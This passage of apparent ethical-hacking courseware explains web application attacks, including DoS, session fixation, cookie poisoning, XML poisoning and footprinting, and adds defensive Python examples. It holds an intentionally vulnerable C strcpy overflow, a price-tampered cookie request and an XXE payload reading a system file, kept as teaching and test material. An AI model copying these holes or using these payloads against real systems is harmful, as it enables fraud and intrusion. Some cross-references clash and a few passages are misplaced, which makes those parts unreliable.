Denial-of-service attacks happen when legitimate users are prevented from performing a desired task or operation. Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling large image files or requesting dynamic pages that require expensive search operations on the backend database servers. The following issues make web applications vulnerable:
- Reasonable use expectations
Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as legitimate clients, which makes them undetectable by existing DoS protection measures. In a web application denial-of-service attack, the attacker targets and tries to exhaust CPU, memory, sockets, disk bandwidth, database bandwidth, and worker processes.
Some of the common ways to perform a web application DoS attack are:
- Bandwidth consumption: flooding a network with data
- Resource starvation: depleting a system's resources
- Programming flaws: exploiting buffer overflows
- Routing and DNS attacks: manipulating DNS tables to point to alternate IP addresses
User Registration DoS: The attacker could create a program that submits the registration forms repeatedly, adding a large number of spurious users to the application.
Login Attacks: The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism, rendering it unavailable or unreasonably slow to respond.
User Enumeration: If the application states which part of the user name/password pair is incorrect, an attacker can automate the process of trying common user names from a dictionary file to enumerate the users of the application.
Account Lock-Out Attacks: The attacker may enumerate user names through another vulnerability in the application and then attempt to authenticate to the site using valid user names and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point legitimate users will not be able to use the site.
Denial of Service (DoS) Example
Most web applications are designed to serve or withstand a limited number of requests. If the limit is exceeded, the web application may fail to serve the additional requests. Attackers take advantage of this to launch denial-of-service attacks on web applications. Attackers send requests to the web application until it is exhausted. Once the web application has received enough requests, it stops responding to other requests, even those sent by authorized users, because the attacker has overwhelmed the web application with false requests. Various web application DoS attacks include:
- User Registration DoS: The attacker could create a program that submits the registration forms repeatedly, adding a large number of spurious users to the application.
- User Enumeration: When the application responds to a failed authentication with an error message that identifies which part of the credentials was incorrect, the attacker can easily automate the procedure by brute-forcing common user names from a dictionary file to enumerate the users of the application.
- Account Lock-Out Attacks: Dictionary attacks can be minimized by applying an account lock-out policy. The attacker, however, may enumerate user names through a vulnerability in the application and then attempt to authenticate to the site using valid user names and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point, legitimate users will not be able to use the site.
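Added example (not from the courseware) covering the user enumeration and account lock-out scenarios above: a login check that returns one uniform failure message whether the user name or the password is wrong, and a throttle keyed by request source rather than by account, so dictionary attempts are slowed without letting an attacker lock legitimate users out. The user store, the password and the client addresses are constructed.

```python
import hmac
import time
from collections import defaultdict, deque
from typing import Callable, Dict, Tuple

# Constructed user store. A real one holds salted password hashes, not plaintext.
USERS = {"alice": "correct horse battery"}
GENERIC_FAILURE = "Invalid username or password"
_DUMMY = "no-such-user-placeholder"


def authenticate(username: str, password: str) -> Tuple[bool, str]:
    """Uniform failure response: an unknown user and a wrong password produce the
    same message, so the login form cannot be used to enumerate valid user names."""
    stored = USERS.get(username)
    # Compare against a dummy value even for unknown users so the response time
    # does not reveal whether the name exists.
    match = hmac.compare_digest((stored or _DUMMY).encode(), password.encode())
    if stored is None or not match:
        return False, GENERIC_FAILURE
    return True, "ok"


class LoginThrottle:
    """Sliding-window limit on failed attempts, keyed by request source (client
    address), not by account. Dictionary attacks are slowed, but an attacker who
    has enumerated names cannot lock those accounts out for their real owners."""

    def __init__(self, max_failures: int, window_seconds: float,
                 clock: Callable[[], float] = time.monotonic):
        self.max_failures = max_failures
        self.window = window_seconds
        self.clock = clock
        self._failures: Dict[str, deque] = defaultdict(deque)

    def _prune(self, source: str) -> None:
        now = self.clock()
        q = self._failures[source]
        while q and now - q[0] > self.window:
            q.popleft()

    def allow(self, source: str) -> bool:
        self._prune(source)
        return len(self._failures[source]) < self.max_failures

    def record_failure(self, source: str) -> None:
        self._failures[source].append(self.clock())


def login(throttle: LoginThrottle, source: str, username: str, password: str) -> Tuple[bool, str]:
    """Login endpoint: the cheap throttle check runs before the authentication tier
    is touched, which also limits the load a login flood can push onto it."""
    if not throttle.allow(source):
        return False, "Too many attempts; try again later"
    ok, msg = authenticate(username, password)
    if not ok:
        throttle.record_failure(source)
    return ok, msg


if __name__ == "__main__":
    th = LoginThrottle(max_failures=3, window_seconds=60)
    for _ in range(4):
        print(login(th, "10.0.0.9", "alice", "wrong"))    # 3 generic failures, then throttled
    print(login(th, "192.0.2.7", "alice", "correct horse battery"))  # owner still gets in
```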
A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables. Attackers modify function pointers used by the application to direct program execution through a jump or call instruction and point it to a location in memory containing malicious code.
Vulnerable Code (reconstructed from the fragments on the slide; the unbounded copy into the 10-byte buffer is the defect the slide illustrates)

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[]) {
        char *dest_buffer;
        dest_buffer = (char *) malloc(10);        /* only 10 bytes allocated */
        if (NULL == dest_buffer)
            return -1;
        if (argc > 1) {
            /* No length check: an argument longer than 9 characters overflows the heap buffer */
            strcpy(dest_buffer, argv[1]);
            printf("%s\n", dest_buffer);
        }
        free(dest_buffer);
        return 0;
    }

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow.
Buffer Overflow Attacks
A buffer has a specified data storage capacity, and if more data is written than that capacity, the buffer overflows; that is, a buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold. Typically, buffers are designed to hold a finite amount of data; additional data can be directed wherever it needs to go. However, the extra data may overflow into neighboring buffers, destroying or overwriting legitimate data.
A buffer overflow attack allows an attacker to modify the target process's address space in order to control the process execution, crash the process, and modify internal variables. When a buffer overflows, the execution stack of the web application is damaged. An attacker can then send specially crafted input to the web application so that it executes arbitrary code, allowing the attacker to take over the machine. Attackers modify function pointers used by the application to redirect program execution, through a jump or call instruction, to a location in memory containing malicious code. Buffer overflows are not easy to discover, and even upon discovery they are difficult to exploit. However, an attacker who recognizes a potential buffer overflow can access a staggering array of products and components.
Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 17: Buffer Overflow Attacks.
Cookie/Session Poisoning
- Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored in a web user's computer) in order to bypass security mechanisms.
- Poisoning allows an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information.
- A proxy can be used for rewriting the session data, displaying the cookie data, and/or specifying a new user ID or other session identifiers in the cookie.
Cookie/Session Poisoning
Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user. Cookies are used to maintain session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's online experience and obtain unauthorized information. Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or on its hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember me?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode them. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet by 13 characters) give many who view cookies a false sense of security.
Threats
The compromise of cookies and sessions can provide an attacker with user credentials, allowing the attacker to access the account and assume the identity of other users of an application. By assuming another user's online identity, the attacker can review the original user's purchase history, order new items, and exploit whatever services and access the vulnerable web application provides. One of the easiest examples involves using the cookie directly for authentication. Another method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the cookie data and/or specifying a new user ID or other session identifiers in the cookie. Cookies can be persistent or non-persistent and secure or non-secure, giving four variants. Persistent cookies are stored on disk and non-persistent cookies are stored in memory. Secure cookies are transferred only over SSL connections.
How Cookie Poisoning Works
Web applications mainly use cookies to simulate a stateful experience for the end user; the cookie serves as the identity the client presents to the server-side components of the web application. This attack alters the value of a cookie on the client side before the request reaches the server. A web server can set a cookie in any response by sending the appropriate header string. Cookies are stored on the user's computer and are a standard way of recognizing users. Once a cookie has been set, it is sent to the web server with every subsequent request. To provide further functionality to the application, cookies can be read and modified by JavaScript. In this attack, the attacker sniffs the user's cookies, modifies the cookie parameters, and submits them to the web server. The server then accepts the attacker's request and processes it.
The following diagram clearly explains the process of a cookie poisoning attack:
1. The user's browser sends the purchase request carrying the cookie previously set by the web server:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host: www.juggyshop.com
    Accept: */*
    Referrer: http://www.juggyshop.com/showprods.aspx
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=11568;

2. The web server replies with the requested page and sets a cookie on the user's browser.
3. The attacker modifies the cookie values (here TotalPrice is changed from 11568 to 100) and submits the poisoned request to the web server:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host: www.juggyshop.com
    Accept: */*
    Referrer: http://www.juggyshop.com/showprods.aspx
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=100;

FIGURE 13.25: How Cookie Poisoning Works
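Added example (not from the courseware) for the cookie poisoning shown in Figure 13.25: the server recomputes the basket total from the item IDs instead of trusting TotalPrice, flags a mismatch, and, as a second defence, issues the cart cookie with an HMAC so that any client-side edit is rejected outright. The signing key and the catalog prices are constructed (the prices are chosen to sum to the slide's 11568).

```python
import hashlib
import hmac
from typing import Dict, Optional

# Constructed server-side secret and catalog (prices in cents); the three item
# prices add up to the original TotalPrice of 11568 shown on the slide.
SECRET = b"constructed-cookie-signing-key"
CATALOG = {"1258": 1699, "2658": 4999, "6652": 4870}

# Constructed sample cookies: the legitimate one and the attacker-modified one from the slide.
COOKIE_ORIGINAL = ("SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; "
                   "Item2=2658; Item3=6652; TotalPrice=11568;")
COOKIE_TAMPERED = ("SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; "
                   "Item2=2658; Item3=6652; TotalPrice=100;")


def parse_cookie(header: str) -> Dict[str, str]:
    """Split a Cookie header value into name/value pairs."""
    pairs = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            pairs[name] = value
    return pairs


def server_side_total(cookie: Dict[str, str]) -> int:
    """Defence 1: never trust a price supplied by the client. Recompute the total
    from the item IDs; an unknown item raises KeyError and the checkout fails."""
    n = int(cookie.get("BasketSize", "0"))
    return sum(CATALOG[cookie[f"Item{i}"]] for i in range(1, n + 1))


def price_tampered(header: str) -> bool:
    """Detection: the client-claimed TotalPrice disagrees with the recomputed one."""
    cookie = parse_cookie(header)
    return int(cookie.get("TotalPrice", "-1")) != server_side_total(cookie)


def _mac(payload: str) -> str:
    return hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()


def seal(header: str) -> str:
    """Defence 2: issue the cart cookie with an HMAC over its contents, so an
    edited cookie is rejected at the server rather than merely detected."""
    payload = header.strip().rstrip(";")
    return f"{payload}; MAC={_mac(payload)}"


def unseal(sealed: str) -> Optional[Dict[str, str]]:
    """Return the cookie pairs only if the MAC verifies; None for a modified cookie."""
    payload, sep, mac_part = sealed.rpartition("; MAC=")
    if not sep or not hmac.compare_digest(mac_part, _mac(payload)):
        return None
    return parse_cookie(payload)


if __name__ == "__main__":
    print(server_side_total(parse_cookie(COOKIE_TAMPERED)))   # 11568, whatever the cookie claims
    print(price_tampered(COOKIE_TAMPERED))                      # True
    print(unseal(seal(COOKIE_ORIGINAL).replace("11568", "100")))  # None: MAC no longer matches
```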
Session Fixation Attack
In a session fixation attack, the attacker tricks the user into accessing a genuine web server using an explicit session ID value.
Session Fixation Attacks
Session fixation helps an attacker hijack a valid user session. In this attack, the attacker authenticates with a known session ID and then lures the victim into using the same session ID. If the victim uses the session ID sent by the attacker, the attacker hijacks the user's validated session, because the session ID in use is already known to the attacker. The session fixation attack procedure is explained with the help of the following diagram:
Diagram: Session fixation attack
1. The attacker logs on to the bank website (juggybank.com) using his credentials; the web server sets a session ID on the attacker's machine.
2. The attacker sends an email containing a link with the fixed session ID: http://juggybank.com/login.jsp?sessionid=4321
3. The user clicks on the link and is redirected to the bank website; the user logs into the server using his credentials and the fixed session ID.
4. The attacker logs into the server using the victim's credentials with the same session ID, assumes the identity of the victim, and exploits the victim's credentials at the server.
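Added example (not from the courseware) of the two server-side controls that defeat the fixation sequence above: a session store that only honours identifiers it issued itself (so a sessionid=4321 taken from a link is discarded) and a login routine that rotates the identifier at authentication, beside the fixation-prone variant that keeps whatever ID the client presented. The store and user names are constructed.

```python
import secrets
from typing import Dict, Optional


class SessionStore:
    """Server-side session table; only IDs minted here are ever honoured, and they
    are read from the session cookie, never from a URL parameter."""

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    def create(self) -> str:
        sid = secrets.token_urlsafe(24)        # 192 random bits: not guessable, not 4321
        self._sessions[sid] = {"user": None}
        return sid

    def resolve(self, presented: Optional[str]) -> str:
        """Map the presented identifier to a session. An ID the server never issued,
        such as one fixed by a link in an email, is discarded and a fresh one issued."""
        if presented is not None and presented in self._sessions:
            return presented
        return self.create()

    def login_vulnerable(self, sid: str, user: str) -> str:
        """Fixation-prone: authenticates into whatever session the client presented,
        so an attacker who planted that ID now shares the victim's logged-in session."""
        self._sessions[sid]["user"] = user
        return sid

    def login(self, sid: str, user: str) -> str:
        """Hardened: rotate the identifier at the privilege change. The pre-login ID,
        which the attacker may know, stops referring to any session at all."""
        self._sessions.pop(sid, None)
        fresh = self.create()
        self._sessions[fresh]["user"] = user
        return fresh

    def user_for(self, sid: str) -> Optional[str]:
        return self._sessions.get(sid, {}).get("user")


if __name__ == "__main__":
    store = SessionStore()
    planted = store.create()                    # ID the attacker obtained by visiting the site
    victim_sid = store.login(store.resolve(planted), "victim")
    print(store.user_for(planted))              # None: the planted ID is dead after login
    print(store.user_for(victim_sid))           # 'victim'
```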
- An improperly configured SSL setup can also help the attacker launch phishing and MITM attacks.
- This vulnerability exposes users' data to untrusted third parties and can lead to account theft.
Insufficient Transport Layer Protection
SSL/TLS should be used for authentication on websites; otherwise the attacker can monitor network traffic to steal an authenticated user's session cookie. Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. The communication between the website and the client should be properly encrypted, or data can be intercepted, injected, or redirected. Once systems are compromised this way, threats such as account theft, phishing attacks, and compromise of admin accounts may follow.
Information gathered from error messages: out of memory, null pointer exceptions, system call failure, database unavailable, network timeout, database information, web application logical flow, application environment.
Example of a verbose error page from the slide (http://juggyboy.com/):

    General Error
    Could not obtain post/user information
    DEBUG MODE
    SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
    SELECT u.username, u.user_id, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_allowsmile, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid FROM nuke_bbposts p, nuke_users u, nuke_bbposts_text pt WHERE p.topic_id = 1547 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time ASC LIMIT 0, 15
    Line: 435
    File: /user/home/geeks/www/vonage/modules/Forums/viewtopic.php
Improper error handling may result in various types of security issues for a website, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. An attacker can learn details such as the network layout and software versions. Improper error handling also gives insight into the source code, such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities for launching attacks. Improper error handling may allow an attacker to gather information such as:
- Out of memory
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
- Application environment
Insecure Cryptographic Storage
Web applications use cryptographic algorithms to encrypt their data and other sensitive information that is transferred from server to client or vice versa, and cryptographic code to protect the data they store. Insecure cryptographic storage refers to the state of an application in which poorly written encryption code is used to store sensitive data in the database. Such insecurely stored data can easily be read and modified by the attacker, who gains confidential and sensitive information such as credit card information, passwords, SSNs, and other authentication credentials that were not protected with appropriate encryption or hashing, and uses it for identity theft, credit card fraud, or other crimes. Developers can avoid such attacks by using proper algorithms to encrypt the sensitive data. The following pictorial representation shows the vulnerable code that is poorly encrypted and the secure code that is properly encrypted using a secure cryptographic algorithm.
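Added example (not the courseware's code) contrasting the insecure and secure storage of the passwords mentioned above: an unsalted, fast hash beside a per-user salted, deliberately slow derivation (PBKDF2-HMAC-SHA256 from the standard library) with a constant-time verification. The sample password and the iteration count are constructed choices.

```python
import base64
import hashlib
import hmac
import os
from typing import Optional


def weak_store(password: str) -> str:
    """Insecure pattern: unsalted, fast hash. Two users with the same password get
    the same stored value, and a leaked table falls to precomputed lookup tables."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Secure storage: a random per-user salt plus a slow key-derivation function.
    The record is self-describing (algorithm$iterations$salt$hash) so the work
    factor can be raised later without breaking existing entries."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    expected = base64.b64decode(dk_b64)
    actual = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), base64.b64decode(salt_b64), int(iterations)
    )
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    print(weak_store("Winter2012") == weak_store("Winter2012"))    # True: identical, no salt
    record = hash_password("Winter2012")
    print(record != hash_password("Winter2012"))                   # True: fresh salt each time
    print(verify_password("Winter2012", record))                   # True
```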
Session ID in URLs: http://juggyshop.com/sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico
Password Exploitation: The attacker gains access to the web application's password database. If user passwords are not encrypted, the attacker can exploit every user's password.
Session ID in URLs: The attacker sniffs the network traffic or tricks the user to obtain the session IDs, and reuses the session IDs for malicious purposes.
Broken Authentication and Session Management
Authentication and session management includes every aspect of user authentication and managing active sessions. Even solid authentication often fails because of weak credential-management functions such as password change, forgot my password, remember my password, account update, etc. Utmost care has to be taken with user authentication. It is always better to use strong authentication methods such as software- and hardware-based cryptographic tokens or biometrics. An attacker uses vulnerabilities in the authentication or session management functions, such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others, to impersonate users.
Unvalidated Redirects and Forwards
An attacker links to an unvalidated redirect and lures the victim into clicking on it. When the victim clicks on the link, thinking that it leads to a valid site, it redirects the victim to another site. Such redirects can lead to the installation of malware and may even trick victims into disclosing passwords or other sensitive information. An attacker targets unsafe forwards to bypass security checks. Unsafe forwards may allow access control bypass, leading to:
- Session fixation attacks
- Security management exploits
- Failure to restrict URL access
- Malicious file execution
FIGURE 13.28: Unvalidated Redirects and Forwards (diagram). Unvalidated redirect: the user follows a link and is redirected to the attacker's server. Unvalidated forward: the attacker requests a page from the server with a forward, http://www.juggyshop.com/purchase.jsp?fwd=admin.jsp, and is forwarded to the administration page (create price list, create item listing, purchase records, registered users).
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
[Figure: web services stack. Layers shown: XML, SOAP, WSDL, Schema, WS-Advertising, etc.; .Net TCP Channel, Fast InfoSet, etc.; WS Work Processes; WS-Security, WS-SecureConversation, WS-Trust, XML Encryption]

Web Services Attack
Web services evolution and their increasing use in business offer new attack vectors in an application framework. Web services are process-to-process communications that have special security issues and needs. Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services, and are vulnerable to various web application threats. Similar to the way a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser. These web services have detailed definitions that allow regular users and attackers alike to understand the construction of the service. In this way, much of the information required to fingerprint the environment and formulate an attack is provided to the attacker. It is estimated that web services reintroduce 70% of the vulnerabilities on the web. Some examples of this type of attack are:
  An attacker injects a malicious script into a web service, and is able to disclose and modify application data.
  An attacker uses a web service for ordering products, and injects a script to reset the quantity and status on the confirmation page to less than what was originally ordered. In this way, the system processing the order request submits the order, ships the order, and then modifies the order to show that a smaller number of products are being shipped. The attacker winds up receiving more of the product than he or she pays for.
Web Services Footprinting Attack
Attackers use the Universal Business Registry (UBR) as a major source for gathering information about web services. It is very useful for both businesses and individuals. It is a public registry that runs on the UDDI specifications and SOAP. It is somewhat similar to a "Whois server" in functionality. To register web services on a UDDI server, businesses or organizations usually use one of the following structures:
  Business Entity
  Business Service
  Binding Template
  Technical Model (tModel)
Hence, attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.
XML Query

POST /inquire HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.microsoft.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 229

<?xml version="1.0" encoding="UTF-8"?>
<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
  <Body>
    <find_business generic="2.0" maxRows="50" xmlns="urn:uddi-org:api_v2">
      <name>amazon</name>
    </find_business>
  </Body>
</Envelope>

HTTP/1.1 100 Continue

XML Response

HTTP/1.1 200 OK
Date: Tue, 28 Sep 2004 10:07:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1272

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <serviceList generic="2.0" operator="Microsoft Corporation" truncated="false"
                 xmlns="urn:uddi-org:api_v2">
      <serviceInfos>
        <serviceInfo serviceKey="[illegible in scan]" businessKey="[illegible in scan]">
          <name xml:lang="en-us">[illegible in scan]</name>
        </serviceInfo>
        (four further serviceInfo entries follow in the capture; their serviceKey, businessKey and name values are illegible in the scan)
      </serviceInfos>
    </serviceList>
  </soap:Body>
</soap:Envelope>
XML Request

<CustomerRecord>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName>
  <LastName>Springfield</LastName>
  <Address>Apt 20, 3rd Street</Address>
  <Email>jason@springfield.com</Email>
  <PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>

Web Services XML Poisoning
XML poisoning is similar to a SQL injection attack. It has a larger success rate in a web services framework. As web services are invoked using XML documents, the traffic that goes between server and browser applications can be poisoned. Attackers create malicious XML documents to alter parsing mechanisms like SAX and DOM that are used on the server. Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic. Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.
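The countermeasure on the receiving side is to refuse anything that does not look exactly like the record the service expects before the parser gets a chance to be poisoned. The following is an added example, not code from the EC-Council material: it takes the CustomerRecord shown above and applies a size limit, rejects any document carrying a DTD (which removes both external entity references and entity-expansion bombs), bounds nesting depth, and requires exactly the expected set of child elements, so an added or duplicated node (node manipulation) is caught rather than silently accepted. The limits and the constructed poisoned variants are assumptions of the example.

```python
import re
import xml.etree.ElementTree as ET

MAX_BYTES = 64 * 1024     # anything larger than a legitimate record is refused before parsing
MAX_DEPTH = 8             # a CustomerRecord is two levels deep; deeper trees are not ours
EXPECTED_FIELDS = ("CustomerNumber", "FirstName", "LastName", "Address", "Email", "PhoneNumber")
DTD_MARKER = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)

class PoisonedXML(ValueError):
    """Raised for any document that does not look like the one record we expect."""

def _depth(elem, level=1):
    return max([level] + [_depth(child, level + 1) for child in elem])

def parse_customer_record(payload: bytes) -> dict:
    """Parse one CustomerRecord from a SOAP body with the checks a poisoned document
    would trip: size limit, no DTD (so no external entities and no entity expansion),
    bounded nesting, exactly the expected child elements, and typed values."""
    if len(payload) > MAX_BYTES:
        raise PoisonedXML("payload exceeds size limit")
    if DTD_MARKER.search(payload):
        raise PoisonedXML("DTD or entity declarations are not accepted")
    try:
        root = ET.fromstring(payload)
    except ET.ParseError as exc:
        raise PoisonedXML(f"malformed XML: {exc}") from None
    if root.tag != "CustomerRecord":
        raise PoisonedXML(f"unexpected root element {root.tag!r}")
    if _depth(root) > MAX_DEPTH:
        raise PoisonedXML("nesting too deep")
    children = list(root)
    tags = [child.tag for child in children]
    if sorted(tags) != sorted(EXPECTED_FIELDS):
        # catches added, missing and duplicated nodes (node manipulation)
        raise PoisonedXML(f"unexpected element set: {tags}")
    if any(len(child) for child in children):
        raise PoisonedXML("leaf fields must not contain child elements")
    record = {child.tag: (child.text or "").strip() for child in children}
    if not record["CustomerNumber"].isdigit():
        raise PoisonedXML("CustomerNumber must be numeric")
    record["CustomerNumber"] = int(record["CustomerNumber"])
    return record

def is_rejected(payload: bytes) -> bool:
    """True when the document is refused by parse_customer_record."""
    try:
        parse_customer_record(payload)
    except PoisonedXML:
        return True
    return False

# The record from the slide, plus constructed poisoned variants.
BENIGN = b"""<CustomerRecord>
  <CustomerNumber>2010</CustomerNumber><FirstName>Jason</FirstName>
  <LastName>Springfield</LastName><Address>Apt 20, 3rd Street</Address>
  <Email>jason@springfield.com</Email><PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""
# External entity reference: refused because the document carries a DTD at all.
XXE = b"""<?xml version="1.0"?><!DOCTYPE CustomerRecord [<!ENTITY ext SYSTEM "file:///etc/hostname">]>
<CustomerRecord><CustomerNumber>&ext;</CustomerNumber></CustomerRecord>"""
# Node manipulation: a second CustomerNumber that a last-wins parser would silently accept.
DUPLICATE_NODE = BENIGN.replace(b"</CustomerRecord>",
                                b"<CustomerNumber>1</CustomerNumber></CustomerRecord>")
# Deep nesting aimed at recursive handlers in the parsing logic.
DEEP_NESTING = b"<CustomerRecord>" + b"<x>" * 40 + b"</x>" * 40 + b"</CustomerRecord>"

if __name__ == "__main__":
    print(parse_customer_record(BENIGN))
    for name, doc in (("XXE", XXE), ("duplicate node", DUPLICATE_NODE), ("deep nesting", DEEP_NESTING)):
        print(f"{name}: rejected={is_rejected(doc)}")
```

Refusing the DTD outright is simpler and safer than trying to configure entity resolution per parser; if the service genuinely needs a schema, validate against an XSD loaded from disk rather than anything named inside the request.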
Module Flow

So far, we have discussed web application components and the various threats associated with web applications. Now we will discuss the web application hacking methodology. A hacking methodology is a way to check every possible way to compromise the web application by attempting to exploit all the potential vulnerabilities present in it.
Web App Hacking Methodology

In order to hack a web application, the attacker initially tries to gather as much information as possible about the web infrastructure. Footprinting is one method by which an attacker can gather valuable information about the web infrastructure or web application.
Web infrastructure footprinting is the first step in web application hacking; it helps attackers select victims and identify vulnerable web applications.
Server Identification
Grab server banners to identify the make and version of the web server software
Service Discovery
Discover the services running on web servers that can be exploited as attack paths for web app hacking
Server Discovery

In server discovery, when there is an attempt to connect to a server, the redirector makes an incorrect assumption that the root of the URL namespace will be WebDAV-
Service Discovery

Discover the services running on web servers that can be exploited as attack paths for web app hacking. Service discovery automatically searches a targeted application environment for loads and services.
Server Identification

Grab the server banners to identify the make and version of the web server software. It consists of:
  Local Identity: specifies the server Origin-Realm and Origin-Host.
  Local Addresses: specify the local IP addresses that the server uses for Diameter Capability Exchange messages (CER/CEA messages).
  Self-Names: specifies the realms to be considered local to the server; any request sent for these realms is treated as if the request specified no realm.
DNS Interrogation provides information about the location and type of servers. DNS Interrogation Tools:
  http://www.dnsstuff.com
  http://network-tools.com
  http://e-dns.org
  http://www.domaintools.com

Port Scanning attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. Port Scanning Tools: [list illegible in the scan]
Footprint Web Infrastructure: Server Discovery
In order to footprint a web infrastructure, first you need to discover the active servers on the internet. Server discovery gives information about the location of active servers on the Internet. The three techniques, namely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.
Whois Lookup

Whois Lookup is a tool that allows you to gather information about a domain with the help of DNS and WHOIS queries. It produces the result in the form of an HTML report. It is a utility that gives information about the IP address of the web server and DNS names. Some of the Whois Lookup tools are:
  http://www.tamos.com
  http://netcraft.com
  http://www.whois.net
  http://www.dnsstuff.com
connect their IP addresses with the respective hostnames and vice versa. When the DNS is improperly configured, it is very easy to exploit it and gather the information required for launching an attack on the target organization. This also provides information about the location and type of servers. Some of the tools are:
  http://www.dnsstuff.com
  http://network-tools.com
  http://e-dns.org
  http://www.domaintools.com
Port Scanning
Port scanning is a process of scanning the system ports to recognize the open doors. If any unused open port is recognized by an attacker, then he or she can intrude into the system by exploiting it. This method attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. Some of the tools are:
  Nmap
  NetScan Tools Pro
  WhatsUp PortScanner Tool
  Hping
TABLE 13.1: Service Discovery

Port                                  Typical HTTP Services
[port numbers illegible in the scan]  World Wide Web standard port
                                      Alternate WWW
                                      Kerberos
                                      SSL (https)
                                      IBM WebSphere administration client
                                      Compaq Insight Manager
                                      Compaq Insight Manager over SSL
                                      Microsoft Application Center Remote management
                                      BEA WebLogic
                                      BEA WebLogic over SSL
                                      Sun Java Web Server over SSL
                                      Alternate Web server, or Web cache
                                      Alternate Web server or management
                                      Apache Tomcat
                                      Sun Java Web Server admin module
                                      Netscape Administrator interface
You can discover the services with the help of tools such as Nmap, NetScan Tools Pro, and Sandcat Browser.

Nmap

Source: http://nmap.org

